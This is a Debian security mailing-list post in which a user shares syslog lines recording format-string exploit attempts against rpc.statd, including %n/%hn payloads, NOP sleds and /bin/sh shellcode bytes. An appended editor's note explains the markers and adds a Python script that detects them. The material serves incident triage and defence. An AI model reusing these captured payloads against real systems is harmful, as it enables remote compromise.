Hello,
I run a PC with potato on a cable modem line. Recently I discovered the
following in /var/log/messages:
Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\
Jun 10 20:33:55 pflanze
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 10 21:01:16 pflanze -- MARK --
Jun 11 13:41:16 pflanze -- MARK --
Jun 11 13:47:10 pflanze
Jun 11 13:47:10 pflanze /sbin/rpc.statd[229]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\
Jun 11 13:47:10 pflanze
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 11 14:01:16 pflanze -- MARK --
Jun 12 09:01:16 pflanze -- MARK --
Jun 12 09:09:47 pflanze
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
220\220\220\220\220\220\220\220\220\220\220\220\220
Jun 12 09:09:47 pflanze
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 12 09:21:16 pflanze -- MARK --
Seems like a buffer overflow. (Is it happening in rpc.statd or in named or
somewhere else?)
I've now removed nfs-common && nfs-server. (BTW there's still a daemon
running (portmap, from netbase) on the sunrpc port - I thought sunrpc was
only (mainly?) for NFS?)
After that I've installed ippl, which gives some interesting output as
well:
Jun 17 04:13:24 asp connection attempt from ACBDC962.ipt.aol.com
[172.189.201.98]
Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
[66.66.4.173]
Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
[66.66.4.173]
Jun 17 11:04:36 webcache connection attempt from
ppp45-net1-idf2-bas1.isdnet.net [195.154.50.45]
Jun 17 18:14:47 sunrpc connection attempt from
h24-79-83-253.vc.shawcable.net [24.79.83.253]
Jun 17 18:17:07 sunrpc connection attempt from skola8.zakladni-skola.cz
[62.168.55.246]
Jun 18 00:07:26 port 445 connection attempt from 62.2.179.7
Jun 18 00:07:26 port 445 connection attempt from [62.2.179.7]
Jun 18 00:07:27 port 445 connection attempt from [62.2.179.7]
Now that I think about it, these will probably all be harmless (maybe
others on this cable modem subnet were serving stuff when they had my IP).
If so, please excuse my anxiety.
.christian.
-- To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
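Editor's note, added as a worked example and not part of the original message: the rpc.statd lines above carry the two classic markers of a printf-style format-string attack rather than a plain buffer overflow. The run of `%8x` directives followed by `%236x%n` (or `%62716x%hn` in the later attempt) is the pattern that reads up the stack and then uses `%n`/`%hn` to write a chosen value into memory, and the long run of `\220` is sysklogd's octal escape for the byte 0x90, the x86 NOP that pads a shellcode landing zone. The "gethostbyname error for" prefix shows the string reached rpc.statd as a hostname it then passed to a logging call. The script below scans syslog-format text for exactly those markers; it is a detection helper written for this note, the sample lines are constructed to resemble the excerpt (binary prefix omitted), and every name in it (`SAMPLE_LOG`, `analyze_line`, `scan`) is an assumption of the example.

```python
import re
from typing import List, Optional

# Constructed sample: syslog lines modelled on the post's excerpt. sysklogd
# writes non-printable bytes as octal escapes, so 0x90 appears as "\220".
# The unprintable binary prefix of the payload is left out of this sample.
SAMPLE_LOG = r"""Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for %8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for %8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220
Jun 12 09:21:16 pflanze -- MARK --
Jun 13 10:00:00 pflanze /sbin/rpc.statd[229]: gethostbyname error for nosuchhost.example.invalid
"""

# "Mon DD HH:MM:SS host message" as written by classic syslogd
SYSLOG_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<msg>.*)$"
)
# "program[pid]: " at the start of the message body
PROGRAM = re.compile(r"^(?P<prog>[^\s:\[]+)(?:\[\d+\])?: ")
# printf directives that WRITE to memory: %n and its h/hh/l/ll variants
WRITE_DIRECTIVE = re.compile(r"%\d*(?:hh|h|ll|l)?n")
# padded hex reads (%8x, %236x): walk up the stack and pad the %n byte count
WIDTH_DIRECTIVE = re.compile(r"%\d+x")
# four or more consecutive 0x90 bytes, raw or as sysklogd's octal escape
NOP_SLED = re.compile(r"(?:\\220|\x90){4,}")


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a line carrying format-string or NOP-sled
    markers, or None for an ordinary line."""
    m = SYSLOG_LINE.match(line)
    if m:
        ts, host, msg = m.group("ts"), m.group("host"), m.group("msg")
    else:  # continuation of a multi-line message: no timestamp or host
        ts, host, msg = None, None, line
    pm = PROGRAM.match(msg)
    prog = pm.group("prog") if pm else None

    writes = len(WRITE_DIRECTIVE.findall(msg))
    widths = len(WIDTH_DIRECTIVE.findall(msg))
    sled = NOP_SLED.search(msg)
    sled_bytes = 0
    if sled:
        sled_bytes = sled.group(0).count("\\220") + sled.group(0).count("\x90")

    reasons = []
    if writes:
        reasons.append(f"{writes} memory-writing directive(s) (%n/%hn)")
    if widths >= 4:
        reasons.append(f"{widths} padded %x directives (stack walk)")
    if sled_bytes:
        reasons.append(f"NOP sled of {sled_bytes} 0x90 bytes")
    if not reasons:
        return None
    return {
        "timestamp": ts,
        "host": host,
        "program": prog,
        "write_directives": writes,
        "width_directives": widths,
        "nop_sled_bytes": sled_bytes,
        "reasons": reasons,
    }


def scan(text: str) -> List[dict]:
    """Scan a block of syslog text; return one finding per suspicious line,
    tagged with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        f = analyze_line(line)
        if f:
            f["lineno"] = lineno
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['lineno']} {f['timestamp']} {f['host']} {f['program']}:")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run against the constructed sample it reports the two rpc.statd payload lines and stays quiet on the MARK lines and on a normal lookup failure, which is the distinction that matters when deciding whether a gethostbyname error is noise or an attempt against the daemon. Feeding it `/var/log/messages` on a box like the one described (`python3 scan.py < /var/log/messages` after swapping `SAMPLE_LOG` for `sys.stdin.read()`) gives a quick triage of how many such attempts the host has logged.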